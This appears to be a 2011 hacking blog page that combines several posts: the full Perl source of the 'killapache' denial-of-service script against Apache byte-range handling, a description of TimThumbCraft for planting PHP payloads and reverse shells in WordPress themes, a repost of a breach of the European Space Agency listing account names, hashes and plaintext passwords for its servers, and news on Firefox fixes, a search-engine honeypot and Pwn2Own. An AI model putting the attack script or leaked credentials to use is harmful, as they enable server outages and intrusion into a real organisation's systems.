Killapache: DDOS Tool For Apache Servers

The Apache Software Foundation has announced a denial-of-service vulnerability that affects all versions of the ubiquitous Apache web server, leaving up to 65% of all websites vulnerable. A unknown flaw in the code for processing byte range headers allows versions 2.2.x of the Apache Web Server to be crippled from a single PC. A suitable “Apache Killer” Perl script that impressively demonstrates the problem.


Advisory - Click here 


How does killapache DDOS tool work?
killapache sends GET requests with multiple “byte ranges” that will claim large portions of the system’s memory space. A “byte range” statement allows a browser to only load certain parts of a document, for example bytes 500 to 1000. It is normally used while downloading large files. This method is used by programs such as download clients to resume downloads that have been interrupted; it is designed to reduce bandwidth requirements. However, it appears that stating multiple unsorted components in the header can cause an Apache server to malfunction.

The code

1. #Apache httpd Remote Denial of Service (memory exhaustion)


2. #By Kingcope


3. #Year 2011


4. #


5. # Will result in swapping memory to filesystem on the remote side


6. # plus killing of processes when running out of swap space.


7. # Remote System becomes unstable.


8. #


9.  


10. use IO::Socket;


11. use Parallel::ForkManager;


12.  


13. sub usage {


14.         print "Apache Remote Denial of Service (memory exhaustion)\n";


15.         print "by Kingcope\n";


16.         print "usage: perl killapache.pl <host> [numforks]\n";


17.         print "example: perl killapache.pl www.example.com 50\n";


18. }


19.  


20. sub killapache {


21. print "ATTACKING $ARGV[0] [using $numforks forks]\n";


22.        


23. $pm = new Parallel::ForkManager($numforks);


24.  


25. $|=1;


26. srand(time());


27. $p = "";


28. for ($k=0;$k<1300;$k++) {


29.         $p .= ",5-$k";


30. }


31.  


32. for ($k=0;$k<$numforks;$k++) {


33. my $pid = $pm->start and next;  


34.        


35. $x = "";


36. my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],


37.                                  PeerPort => "80",


38.                                          Proto    => 'tcp');


39.  


40. $p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";


41. print $sock $p;


42.  


43. while(<$sock>) {


44. }


45.  $pm->finish;


46. }


47. $pm->wait_all_children;


48. print ":pPpPpppPpPPppPpppPp\n";


49. }


50.  


51. sub testapache {


52. my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],


53.                                  PeerPort => "80",


54.                                          Proto    => 'tcp');


55.  


56. $p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";


57. print $sock $p;


58.  


59. $x = <$sock>;


60. if ($x =~ /Partial/) {


61.         print "host seems vuln\n";


62.         return 1;      


63. } else {


64.         return 0;      


65. }


66. }


67.  


68. if ($#ARGV < 0) {


69.         usage;


70.         exit;  


71. }


72.  


73. if ($#ARGV > 1) {


74.         $numforks = $ARGV[1];


75. } else {$numforks = 50;}


76.  


77. $v = testapache();


78. if ($v == 0) {


79.         print "Host does not seem vulnerable\n";


80.         exit;  


81. }


82. while(1) {


83. killapache();


84. }

Tim Thumb Wordpress Exploit

Recently tim thumb wordpress 0 day exploit is released by MaxE it caches even remote files locally, without doing any proper sanitization. The file “timthumb.php” does however, check if to see if the target file is actually an image or not. This timthumb file is also quite often renamed to something else and is used in many themes.

TimThumbCraft – Image Crafting Tool

The easiest way to trick TimThumb into believing a remotely stored image (that also contains evil PHP code) is an actual image, is to either craft it yourself or by using an external tool. Here is small tool for the job which also has a few encoding features, payload types, and of course, options for custom images.

Feature List:

List known vulnerable themes
Choose between 2 images or select your own
Enter your own code or use the Reverse PHP Shell
Encode your PHP Payload, this applies only if “code” is chosen
Base64 and Hexadecimal encoding is currently supported
Hexadecimal output of the created file. (Can be used in paste’s, etc.)
MD5 calculation of filename, that the target server will most likely use

References:
Proof of Concept: http://www.exploit-db.com/exploits/17602/
TimThumbCraft: Download it here
Demo Video (LQ): http://www.youtube.com/watch?v=udyEOzHK08E
Demo Video (HQ): https://rapidshare.com/files/2016620847/timthumb.avi
Original Info: http://markmaunder.com/2011/zero-day-vulnerability-in-many-wordpress-themes/
Vulnerable Themes: http://blog.sucuri.net/2011/08/timthumb-security-vulnerability-list-of-themes-including-it.html

source: http://www.exploit-db.com/wordpress-timthumb-exploitation/

Mozilla Firefox4.0.1 First Security Update

Mozilla Released it's first release of Mozilla Firefox Firefox 4.0.1 which is a open source browser.

Fourteen flaws have been found in Firefox 4.0.1 from which 13 flaws are categorized as critical Vulnerabilities and one is mentioned low impact Vulnerability.

The biggest category of fixed vulnerabilities in Firefox 4.0.1 are memory safety related issues, with 10 identified flaws.

"Mozilla developers identified and fixed several memory safety bugs in the browser engine used in Firefox and other Mozilla-based products," Mozilla warned in its advisory. "Some of these bugs showed evidence of memory corruption under certain circumstances, and we presume that with enough effort at least some of these could be exploited to run arbitrary code." 

You can check their warning here - Here

The high impact category of flaws is in WebGL and its related WebGLES graphics library. Mozilla is providing three fixes for WebGLES flaws in the Firefox 4.0.1 update.

 As opposed to the critical memory flaws that Mozilla is patching with the Firefox 4.0.1 release, the XSLT flaw will not lead to arbitrary code execution. According to Mozilla, the XSLT flaw could have been used by an attacker to help launch some form of memory corruption that could possibly make another attack more reliable.  

The Firefox 4.0.1 release is the first update to Mozilla's browser since Firefox 4 release in March. Firefox developers are currently on Firefox 5, which may release at JUNE last

Detecting Google hacking against your Website

Google or other search engines have been used for many purposes such as finding useful information, important websites and latest news on different topics, Google index a huge number of web pages that are growing daily. From the security prospective these indexed pages may contain different sensitive information.

Google hack involves using advance operators in the Google search engine to locate specific strings of text within search results. Some of the more popular examples are finding specific versions of vulnerable Web applications.
GHH is a “Google Hack” honeypot. GHH is designed to provide reconnaissance against attackers that use search engines as a hacking tool against your resources so it implements honeypot theory to provide additional security to your web presence.
To install the Google Honeypot on your website you follow the install instructions. This allows you to monitor attempts by malicious attackers to compromise your security. The logging functions that GHH implements allows you, the administrator, to do what you like with the information. You can use the attack database to gather statistics on would-be-attackers, report activities to appropriate authorities and temporarily or permanently deny access to resources.

European Space Agency (ESA.INT) Hacked – Full Disclosure

( European Space Agency )

The European Space Agency (ESA), established in 1975, is an intergovernmental organisation dedicated to the exploration of space, currently with 18 member states. Headquartered in Paris, ESA has a staff of more than 2,000 with an annual budget of about €3.99 billion / $5.65 billion US dollars (2011).
ESA’s space flight program includes human spaceflight, mainly through the participation in the International Space Station program, the launch and operations of unmanned exploration missions to other planets and the Moon, Earth observation, science, telecommunication as well as maintaining a major spaceport, the Guiana Space Centre at Kourou, French Guiana, and designing launch vehicles. The main European launch vehicle Ariane 5 is operated through Arianespace with ESA sharing in the costs of launching and further developing this launch vehicle.
More here.

******************************************************************
(+) Authors : TinKode
(+) WebSite : TinKode27.BayWords.Com
(+) Date    : 17.04.2011
(+) Hour    : 17:17 PM
(+) Targets : www.esa.int (European Space Agency)
(+) Document: ESA.int Full Disclosure (Hacked)
(+) Method  : UnKn0Wn
******************************************************************

Text Files:

• Main informations about server.  Click here.
• Main accounts from ESA.INT (Root Accounts,  Emails, FTPs,  Admins,  Editors,  etc). Click here.

Emails:

Preview of Root accounts,  Emails,  FTPs,  etc:

[Root Account]
---------------------------------------------------------------------
Username = root
Password = *8009BCFDDF013C178B831737138F2A3D8E652B8E (SHA1)

[DB Accounts]
---------------------------------------------------------------------
Username = jbossuser
Password = 49c6641168b072d0

Username = psocrat
Password = 49c6641168b072d0 

Username = root
Password = 49c6641168b072d0 

Username = jbossuser
Password = 7fe05ad56133d52b 

Username = psocrat
Password = 7fe05ad56133d52b 

[Administrator Account]
---------------------------------------------------------------------
username = rnay06
password = eduxxxr3
admin    = y

[Editor account]
---------------------------------------------------------------------
Username = editor
Password = editor2005

[FTP Accounts]
---------------------------------------------------------------------
Password : service2004
Username : nrtservice
Webserver: localhost
Protocol : scp

Username : riverusr
Password : usrriver
WebServer: styx.esrin.esa.it
Protocol : ftp

Username : mapinject
Password : .mapinject
Webserver: ssems1.esrin.esa.int
Protocol : sftp

Password : fire
Username : wfaa
WebServer: twin.esrin.esa.int
Protocol : ftp

Password : MMvomir07.
Username : uvomir
Webserver: 193.204.231.156
More     : http://whois.domaintools.com/193.204.231.156
Protocol : sftp

Password : 12qwas
Username : kimv
Webserver: kes.esrin.esa.int
Protocol : ftp

Password : Bk7Wdkf6hY
Username : emathot
Webserver: testlab4.esrin.esa.int
Protocol : ftp

Password : MecoGPOD123
Username : MecoGPOD
Webserver: metheny.esrin.esa.int
Protocol : ftp

Password : brteon
Username : betlem
Webserver: uranus.esrin.esa.it
Protocol : ftp

Password : ch9l
Username : ftpriv
Webserver: uranus.esrin.esa.int
Protocol : ftp

Password : .mapinject
Username : mapinject
Webserver: ssems1.esrin.esa.int
Protocol : sftp

Password : esa2004
Username : Olivier
Webserver: dummy.server.esa.int
Protocol : ftp

Password : .passWIL
Username : wilkinsa
Webserver: esa-mm.esa.int
Protocol : ftp

The ESA Logs:

source:tinkode

Hacking Exposed: Web Applications Ebook 3rd Edition

The latest Web app attacks and countermeasures from world-renowned practitioners Protect your Web applications from malicious attacks by mastering the weapons and thought processes of today's hacker. Written by recognized security practitioners and thought leaders, Hacking Exposed Web Applications, Third Edition is fully updated to cover new infiltration methods and countermeasures. Find out how to reinforce authentication and authorization, plug holes in Firefox and IE, reinforce against injection attacks, and secure Web 2.0 features. Integrating security into the Web development lifecycle (SDL) and into the broader enterprise information security program is also covered in this comprehensive resource.

* Get full details on the hacker's footprinting, scanning, and profiling tools, including SHODAN, Maltego, and OWASP DirBuster * See new exploits of popular platforms like Sun Java System Web Server and Oracle WebLogic in operation * Understand how attackers defeat commonly used Web authentication technologies * See how real-world session attacks leak sensitive data and how to fortify your applications * Learn the most devastating methods used in today's hacks, including SQL injection, XSS, XSRF, phishing, and XML injection techniques * Find and fix vulnerabilities in ASP.NET, PHP, and J2EE execution environments * Safety deploy XML, social networking, cloud computing, and Web 2.0 services * Defend against RIA, Ajax, UGC, and browser-based, client-side exploits * Implement scalable threat modeling, code review, application scanning, fuzzing, and security testing procedures

download: Hacking Exposed: Web Applications Ebook 3rd Edition
FileSonic.com     letitbit.net

PWN2OWN OVERVIEW & RESULTS

The Zero Day Initiative team is having the annual Pwn2Own contest March 9th, 10th, and 11th of 2011 in Vancouver. The contest always seems to be an interesting spectacle – seeing how fast certain systems are compromised, learning how companies respond to the vulnerability disclosures, and seeing patches come out up to the very last minute. The targets this year will be 4 popular web browsers and 4 mobile devices.

Browers

This year the web browser targets will be the latest release candidate (at the time of the contest) of the following products:

• Microsoft Internet Explorer
• Apple Safari
• Mozilla Firefox
• Google Chrome

Each browser will be installed on a 64-bit system running the latest version of either OS X or Windows 7.
A successful hack of IE, Safari, or Firefox will net the competitor a $15,000 USD cash prize, the laptop itself, and 20,000 ZDI reward points which immediately qualifies them for Silver standing. Benefits of ZDI Silver standing include a one-time $5,000 USD cash payment, 15% monetary bonus on all ZDI submissions in 2011, 25% reward point bonus on all ZDI submissions in 2011 and paid travel and registration to attend the DEFCON Conference in Las Vegas.
As for Chrome, the contest will be a two-part one. On day 1, Google will offer $20,000 USD and the CR-48 if a contestant can pop the browser and escape the sandbox using vulnerabilities purely present in Google-written code. If competitors are unsuccessful, on day 2 and 3 the ZDI will offer $10,000 USD for a sandbox escape in non-Google code and Google will offer $10,000 USD for the Chrome bug. Either way, plugins other than the built-in PDF support are out of scope.

Mobile Devices

The following are the target mobile devices for the contest:

• Dell Venue Pro running Windows 7
• iPhone 4 running iOS
• Blackberry Torch 9800 running Blackberry 6 OS
• Nexus S running Android

As mentioned previously, we’ve upped the ante this time around and the total cash pool allotted for prizes has risen to a whopping $125,000 USD. While HP TippingPoint is funding $105,000 of that, we’ve partnered with Google who has generously offered up $20,000 to the researcher who can best their Chrome browser.

Interestingly, an RF enclosure box will be used for the mobile targets as there seems to be the possibility that

The Results of Pwn2Own 2011

 Browsers

“Safari goes down first at #pwn2own”
“Stephen Fewer @stephenfewer just successfully compromised Internet Explorer (complete with a Protected Mode bypass) at Pwn2Own.”
The exploit used to exploit IE8 is not present in IE9, which ships on Monday.
Chrome and Firefox, the other browsers in the contest, went unchallenged.

MOBILE PHONES

the Apple iPhone 4 and RIM’s Blackberry Torch 9800 were both successfully compromised on day 2 of the contest.
Android and Windows Phone 7 based devices survived the challenge.
It was a vulnerability in WebKit that allowed the Blackberry to be compromised. Google has responded by patching the exploit in their WebKit-based Google Chrome.

REPORTS


Ars Technica has good write-ups on Day 1 and Day 2 of Pwn2Own 2011. In those write-ups you’ll find a lot more details of the winners and some of the compromises.